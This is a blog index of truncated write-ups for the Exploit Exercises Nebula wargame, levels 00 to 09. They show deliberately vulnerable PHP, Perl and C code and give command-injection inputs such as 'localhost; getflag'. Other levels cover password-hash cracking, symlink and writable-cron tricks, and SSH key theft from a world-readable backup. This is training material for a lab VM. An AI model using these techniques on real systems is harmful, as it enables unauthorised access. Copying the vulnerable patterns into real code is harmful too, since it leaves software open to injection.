Browsed by
Category: Nebula 5

Exploit Exercises Nebula 5: Level 09 Write Up

Level: https://exploit-exercises.com/nebula/level09/

There's a C setuid wrapper for some vulnerable PHP code… To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09.

```php
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
```

Using the e modifier is dangerous and has been removed as of PHP 7.0.0. It makes preg_replace evaluate the replacement string (the second argument) as PHP code after the backreferences are substituted. There is a $useme parameter which might come in handy. So what happens is you pass it…

Exploit Exercises Nebula 5: Level 08 Write Up

Level: https://exploit-exercises.com/nebula/level08/

World readable files strike again. Check what that user was up to, and use it to log into flag08 account. To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

```bash
ls -la /home/flag08
```

What's that capture.pcap? Let's load that in Wireshark. Let's open our Kali VM.

```bash
scp level08@192.0.2.1:/home/flag08/capture.pcap ~/Downloads/
wireshark ~/Downloads/capture.pcap
```

Open capture.pcap in Wireshark. Right click on the first entry, mouse over Follow and…

Exploit Exercises Nebula 5: Level 07 Write Up

Level: https://exploit-exercises.com/nebula/level07/

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

```perl
$host = $_[0];
print("<html><head><title>Ping results</title></head><body><pre>");
@output = `ping -c 3 $host 2>&1`;
…
ping(param("Host"));
```

The program allows command injection via `?Host=`. Let's set it to `localhost; getflag`. But how…

Exploit Exercises Nebula 5: Level 06 Write Up

Level: https://exploit-exercises.com/nebula/level06/

The flag06 account credentials came from a legacy unix system. To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

```bash
cat /etc/passwd | grep flag06
```

Gives us

```
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
```

Now fire up Kali because we need to use John the Ripper

```bash
echo "flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh" > crack
john --show crack
```

```
flag06:hello:993:993::/home/flag06:/bin/sh
```

Our password is hello

Back on the Nebula system:

```
su flag06
Password: hello
getflag
You have successfully…
```

Exploit Exercises Nebula 5: Level 05 Write Up

Level: https://exploit-exercises.com/nebula/level04/

Check the flag05 home directory. You are looking for weak directory permissions. To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

```bash
cd /home/flag05
ls -la
ls -la .backup
# the archive lives inside .backup, so copy it from there
cp .backup/backup-19072011.tgz ~
cd
tar xvfz backup-19072011.tgz
cd .ssh
ssh -i id_rsa flag05@localhost
getflag
```

You have successfully executed getflag on a target account.

Exploit Exercises Nebula 5: Level 04 Write Up

Level: https://exploit-exercises.com/nebula/level04/

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :) To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

We can bypass this check by creating a symbolic link.

```bash
ln -s /home/flag04/token /home/level04/foo
/home/flag04 /home/level04/foo
```

And you'll see the token in the output.

Exploit Exercises Nebula 5: Level 03 Write Up

Level: https://exploit-exercises.com/nebula/level03/

Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.

```bash
ls -la /home/flag03
```

writeable.sh executes `bash -x` for every file in writeable.d. writeable.d is world writeable, so we can place our own file there.

```bash
echo "getflag > /home/flag03/flag" > /home/flag03/writeable.d/test
chmod +x /home/flag03/writeable.d/test
```

Wait…

Exploit Exercises Nebula 5: Level 02 Write Up

Level: https://exploit-exercises.com/nebula/level02/

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

```c++
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); //command injection
printf("about to call system(\"%s\")\n", buffer);
system(buffer);
```

The code has a command injection vulnerability. We can exploit this by setting the environment variable `USER` to `test; getflag`

…

Exploit Exercises Nebula 5: Level 01 Write Up

Level: https://exploit-exercises.com/nebula/level01/

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

```bash
ls /home/flag01
stat /home/flag01/flag01
```

/home/flag01/flag01 has the setuid bit set so it will run as the owner (flag01).

```c++
system("/usr/bin/env echo and now what?");
```

`/usr/bin/env` tells the system to search for `echo` in **our** PATH not…

Exploit Exercises Nebula 5: Level 00 Write Up

Start: https://exploit-exercises.com/nebula/
Level: https://exploit-exercises.com/nebula/level00/
Download: https://exploit-exercises.com/download/
SHA256: da2e6ba445b630fd07f0bb0d2866491fc898f0429d9d380e1ebbf24f3e407d3f

I used the Linux/Ubuntu setting in VMware.

This level requires you to find a Set User ID program that will run as the "flag00" account.

```
nebula login: level00
Password: level00
```

```bash
find / -type f -user flag00 2>/dev/null #find files owned by flag00 (ignoring errors)
stat /rofs/bin/…/flag00 #check the obvious file if it has setuid
/rofs/bin/…/flag00 #run it
getflag #get our flag
```

You have successfully executed getflag on a target account.

`-rwsr-x---` The s…
